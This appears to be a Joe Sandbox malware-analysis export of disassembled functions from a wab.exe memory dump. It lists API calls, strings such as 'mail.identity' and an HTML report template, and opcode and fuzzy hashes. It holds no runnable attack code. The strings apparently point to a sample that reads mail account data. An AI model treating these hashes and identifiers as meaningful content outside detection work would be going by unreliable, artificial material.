                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FocusMessagePostmemset
                      • String ID: S_@$l
                      • API String ID: 3436799508-4018740455
                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                      Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004092C0
                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • _mbscpy.MSVCRT ref: 004092FC
                      Strings
                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString_mbscpymemset
                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                      • API String ID: 408644273-3424043681
                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                      Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy
                      • String ID: C^@$X$ini
                      • API String ID: 714388716-917056472
                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                      Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                      • String ID: MS Sans Serif
                      • API String ID: 3492281209-168460110
                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                      Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClassName_strcmpimemset
                      • String ID: edit
                      • API String ID: 275601554-2167791130
                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                      Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$_mbscat
                      • String ID: 3CD
                      • API String ID: 3951308622-1938365332
                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                      Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: rows deleted
                      • API String ID: 2221118986-571615504
                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                      Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$memset
                      • String ID:
                      • API String ID: 1860491036-0
                      • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                      • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                      Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                      Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                      Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                      Download Yara Rule
                      APIs
                      • __allrem.LIBCMT ref: 00425850
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                      • __allrem.LIBCMT ref: 00425933
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                      Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                      • too many SQL variables, xrefs: 0042C6FD
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                      • API String ID: 2221118986-515162456
                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                      Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                      • memset.MSVCRT ref: 004026AD
                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                        • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                      • LocalFree.KERNEL32(?), ref: 004027A6
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                      • String ID:
                      • API String ID: 1593657333-0
                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                      Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040C922
                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Message$MenuPostSendStringmemset
                      • String ID:
                      • API String ID: 3798638045-0
                      • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                      • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                      Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                      • strlen.MSVCRT ref: 0040B60B
                      • atoi.MSVCRT ref: 0040B619
                      • _mbsicmp.MSVCRT ref: 0040B66C
                      • _mbsicmp.MSVCRT ref: 0040B67F
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbsicmp$??2@??3@atoistrlen
                      • String ID:
                      • API String ID: 4107816708-0
                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                      Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                      • String ID:
                      • API String ID: 1886415126-0
                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                      Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen
                      • String ID: >$>$>
                      • API String ID: 39653677-3911187716
                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                      Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: @
                      • API String ID: 3510742995-2766056989
                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                      Function 0040796E Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                      Download Yara Rule
                      APIs
                      • strlen.MSVCRT ref: 0040797A
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                        • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                        • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                      • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                      • memcpy.MSVCRT ref: 004079DD
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocstrlen
                      • String ID:
                      • API String ID: 1171893557-0
                      • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                      • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                      Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi
                      • String ID: C@$mail.identity
                      • API String ID: 1439213657-721921413
                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                      Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00406640
                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                        • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                        • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                      • memcmp.MSVCRT ref: 00406672
                      • memcpy.MSVCRT ref: 00406695
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset$memcmp
                      • String ID: Ul@
                      • API String ID: 270934217-715280498
                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                      Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                        • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                      • sprintf.MSVCRT ref: 0040B929
                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                      • sprintf.MSVCRT ref: 0040B953
                      • _mbscat.MSVCRT ref: 0040B966
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                      • String ID:
                      • API String ID: 203655857-0
                      • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                      • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                      Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                      • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                      Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                      Strings
                      • recovered %d pages from %s, xrefs: 004188B4
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                      • String ID: recovered %d pages from %s
                      • API String ID: 985450955-1623757624
                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                      Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _ultoasprintf
                      • String ID: %s %s %s
                      • API String ID: 432394123-3850900253
                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                      Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00409919
                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSendmemset
                      • String ID: N\@
                      • API String ID: 568519121-3851889168
                      • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                      • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                      • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                      • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                      Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadMenuA.USER32(00000000), ref: 00409078
                      • sprintf.MSVCRT ref: 0040909B
                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                      Strings
                      Memory Dump Source
